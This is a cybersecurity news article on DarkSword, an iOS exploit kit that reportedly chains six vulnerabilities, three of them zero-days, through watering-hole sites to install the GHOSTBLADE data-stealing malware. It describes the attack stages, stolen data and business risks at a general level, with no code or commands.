DarkSword iOS Exploit Kit Enables Full Device Takeover Using Zero-Day Chain

A sophisticated iOS exploit kit uses six vulnerabilities, including three zero-days, to silently steal data within minutes.

A newly uncovered iOS exploit kit, DarkSword, is raising serious concerns across the cybersecurity landscape. Unlike traditional mobile threats, this toolkit delivers full device compromise with minimal user interaction, making it one of the most advanced iPhone attack chains observed in recent months.

According to threat intelligence findings, multiple actors—including suspected state-linked groups and commercial surveillance vendors—have actively deployed DarkSword since late 2025. The campaigns have targeted users across regions such as Saudi Arabia, Turkey, Malaysia, and Ukraine. Meanwhile, its use alongside another exploit kit, Coruna, signals a rapid expansion of high-end mobile exploitation capabilities.

How the Attack Works

DarkSword operates through a watering hole attack technique, where attackers compromise legitimate websites and inject malicious scripts. When a user visits the infected site via Safari, the exploit chain activates automatically.

The attack unfolds in stages:

• First, a hidden iFrame loads JavaScript to fingerprint the device and iOS version
• Then, the exploit chain leverages multiple vulnerabilities to achieve remote code execution
• Next, it escapes Apple’s sandbox protections using GPU and system-level processes
• Finally, it gains kernel-level access, enabling complete control over the device

As a result, attackers can deploy a data-harvesting malware known as GHOSTBLADE, which operates with elevated privileges.

Zero-Day Exploitation at Scale

What makes DarkSword particularly dangerous is its use of six vulnerabilities, including three zero-days that were actively exploited before Apple released patches.

These vulnerabilities affect key components such as:

• JavaScriptCore (Safari rendering engine)
• iOS kernel memory management
• GPU and system-level processes

Therefore, even fully secured environments can become vulnerable if patching is delayed. This highlights the growing sophistication of exploit chains that combine multiple weaknesses into a seamless attack.

What Data Is Being Stolen

Once the device is compromised, DarkSword quickly extracts a wide range of sensitive data, including:

• Credentials and saved passwords
• Cryptocurrency wallet and exchange data
• Messages (SMS, WhatsApp, Telegram)
• Emails, contacts, and call history
• Photos, files, and iCloud data
• Location history and Wi-Fi credentials

Notably, the malware follows a “hit-and-run” approach. It collects and exfiltrates data within minutes and then cleans up traces, reducing the chances of detection

Why This Threat Is Different

Unlike traditional spyware that maintains long-term persistence, DarkSword focuses on speed and stealth. This shift indicates a new trend where attackers prioritize rapid monetization and intelligence gathering over prolonged surveillance.

Additionally, the exploit kit appears to be part of a growing underground market for advanced mobile exploits. This means even less sophisticated actors can now access powerful tools once reserved for elite nation-state operations.

Business & Security Implications

From a business perspective, this development introduces critical risks:

• Mobile devices are now primary attack surfaces, especially for executives and remote workers
• Zero-day exploit chains reduce the effectiveness of traditional security controls
• Financial and crypto-related data theft is becoming a key attacker objective

Therefore, organizations in the UAE and globally must rethink mobile security strategies, focusing on proactive monitoring, rapid patching, and threat intelligence integration.

What Happens Next

The emergence of DarkSword, alongside similar exploit kits, suggests a future where:

• Mobile zero-day markets continue to expand
• Attack chains become more modular and reusable
• Financially motivated actors gain access to nation-state-grade capabilities

As a result, the line between cybercrime and cyber-espionage continues to blur.